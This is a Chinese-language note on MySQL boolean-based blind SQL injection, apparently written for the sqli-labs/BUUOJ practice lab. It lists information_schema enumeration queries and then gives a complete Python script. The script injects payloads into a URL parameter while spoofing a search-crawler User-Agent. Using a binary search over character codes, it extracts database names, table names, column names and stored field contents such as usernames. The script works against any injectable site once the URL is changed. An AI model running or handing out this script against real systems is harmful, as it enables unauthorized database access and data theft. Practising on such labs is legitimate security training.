mysql bool盲注

MySQL中查询所有数据库名和表名

1.查询所有数据库

show databases;
(select group_concat(schema_name ) from information_schema.schemata)

2.查询指定数据库中所有表名

(select group_concat(table_name) from information_schema.tables where table_schema=database())

3.查询指定表中的所有字段名
(select group_concat(column_name) from information_schema.columns where table_name='表名')

4.查询指定字段中的内容

(select group_concat(字段名) from 数据库.表名) ,(select group_concat(username) from security.users)

group_concat(字段) from (表名)
 

import requests
from urllib.parse import quote

session = requests.session()

# url = "http://61.147.171.105:62055/view.php?no=1"
url="http://35bc1ed6-1ac7-4e98-8a8f-becd773b3277.node4.buuoj.cn/Less-1/?id=1'" #闭合方式在这里体现
# 爬虫请求头
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
        'Referer': "http://www.baidu.com/"
}

# 用户请求头
# headers = {
#     'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
#     'Referer': "https://creator.douyin.com/"
# }

#设置访问正确时的判断数据
success_text="Your Login name"


#爆当前数据库名长度
def Database_length():
    database_length=0
    for i in range(1,10):
        payload = quote(" and length(database())="+str(i)+"#")#对特殊符号进行url编码
        text=session.get(url+payload,headers=headers).text
        if success_text in text:
            database_length=i
            break
    print("database_length:",database_length)



# 爆当前数据库名字
def Database_name():
    database_name=""
    for i in range(1,100):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 =" and ascii(substr(database(), " + str(i) + ", 1)) = " + str(mid)+"#"
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                database_name+=chr(mid)
                print(database_name)
                break
            payload2 = quote(" and ascii(substr(database(), " + str(i) + ", 1)) > " + str(mid)+"#")
            text2 = requests.get(url+payload2 , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid

    print("database_name:", database_name)

# 爆数据库名
def Databases_names():
    databases_names=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d # "%(i,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                databases_names+=chr(mid)
                print(databases_names)
                break
            payload2 = " and  (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d # "%(i,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid

    print("databases_names:",databases_names)

# 爆表名
def Tables_name(database_name):
    tables_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d # "%(i,database_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                tables_name+=chr(mid)
                print(tables_name)
                break
            payload2 = " and  (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d # "%(i,database_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid

    print("tables_names:",tables_name)



# 爆列名
def Columns_name(table_name):
    columns_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d # "%(i,table_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                columns_name+=chr(mid)
                print(columns_name)
                break
            payload2 = " and  (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d # "%(i,table_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("tables_names:",columns_name)



# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
def Dump(database_name,table_name,columns_name):
    dump=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d # "%(columns_name,i,database_name,table_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                dump+=chr(mid)
                print(dump)
                break
            payload2 = " and  (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d # "%(columns_name,i,database_name,table_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("dump:",dump)

# 爆当前数据库长度
# Database_length()

#爆当前数据库名
# Database_name()

# 爆所有数据库名
Databases_names()

# 爆指定数据库表名
# 参数为数据库名字
# Tables_name("security")

# 爆指定表名的列名
# 参数为表名
# Columns_name("emails")

# 爆指定数据库、表、列名的内容
# Dump("security","users","username")